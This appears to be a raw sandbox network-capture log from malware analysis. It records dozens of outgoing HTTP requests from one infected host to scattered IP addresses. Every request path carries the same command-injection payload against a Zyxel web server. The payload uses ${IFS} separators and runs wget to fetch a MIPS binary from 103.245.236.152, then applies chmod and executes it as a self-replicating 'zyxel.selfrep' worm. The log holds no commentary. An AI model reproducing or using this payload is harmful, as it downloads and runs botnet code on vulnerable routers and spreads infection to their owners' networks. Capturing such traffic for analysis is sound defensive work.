                                        Jan 14, 2024 16:18:31.150002003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        778192.168.2.133681642.54.247.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150032043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        779192.168.2.1338544223.234.55.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150078058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        780192.168.2.1359842158.215.39.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150115013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        781192.168.2.1358680193.197.112.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150152922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        782192.168.2.1349080217.139.214.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150186062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        783192.168.2.133972898.143.182.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150247097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        784192.168.2.134791442.136.112.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150284052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        785192.168.2.135639017.68.173.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150312901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        786192.168.2.1354488170.98.187.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150386095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        787192.168.2.135745468.146.190.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150455952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        788192.168.2.135051036.35.26.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150460958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        789192.168.2.1354114188.208.16.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150500059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        790192.168.2.136051413.14.90.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150522947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        791192.168.2.1360212202.80.74.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150593042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        792192.168.2.135639880.19.79.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150619030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        793192.168.2.133373091.9.154.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150648117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        794192.168.2.1357284110.8.117.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150669098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        795192.168.2.133686636.249.105.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150748014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        796192.168.2.1354484142.195.16.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150763035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        797192.168.2.1334302137.221.18.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150801897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        798192.168.2.1350356221.23.99.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150849104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        799192.168.2.1357402208.25.211.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150907993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        800192.168.2.1353512182.14.238.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150928974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        801192.168.2.134735214.196.249.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.150969028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        802192.168.2.134331489.241.136.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151005030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        803192.168.2.135970297.170.15.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151050091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        804192.168.2.1350026207.198.148.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151113033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        805192.168.2.135385498.177.8.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151169062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        806192.168.2.13451561.252.222.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151230097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        807192.168.2.135261017.90.165.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151273966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        808192.168.2.1344480174.152.222.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151308060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        809192.168.2.133677258.184.51.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151372910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        810192.168.2.1358338140.137.201.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151401997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        811192.168.2.1344062104.215.243.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151449919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        812192.168.2.136087692.0.225.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151503086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        813192.168.2.1339090152.43.232.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151527882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        814192.168.2.1336202144.81.3.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151578903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        815192.168.2.133802095.33.56.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151613951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        816192.168.2.1350488202.233.217.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151652098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        817192.168.2.1345948176.216.89.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151684046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        818192.168.2.1358578169.214.94.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151731968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        819192.168.2.133721698.204.60.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151767015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        820192.168.2.133981243.89.19.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151801109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        821192.168.2.135413284.166.211.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151829958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        822192.168.2.1359978157.210.66.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151880980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        823192.168.2.1355992123.13.150.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151915073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        824192.168.2.135965023.148.8.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.151972055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        825192.168.2.1338086160.117.120.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152005911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        826192.168.2.136059070.176.32.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152045012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        827192.168.2.1351244126.77.1.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152086973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        828192.168.2.1345900192.195.26.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152122974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        829192.168.2.1360402172.41.197.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152178049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        830192.168.2.1341438107.151.4.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152215004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        831192.168.2.133425219.58.144.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152266026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        832192.168.2.1353438143.203.71.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152316093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        833192.168.2.1354030158.117.124.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152343988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        834192.168.2.1344486208.47.212.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152364016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        835192.168.2.1335942193.41.88.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152400017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        836192.168.2.1341196158.101.145.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152472019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        837192.168.2.1340714128.1.211.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152498960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        838192.168.2.1346904159.254.231.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152532101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        839192.168.2.135198447.107.114.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.152559996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        840192.168.2.1346126155.227.19.226443
                                        TimestampBytes transferredDirectionData
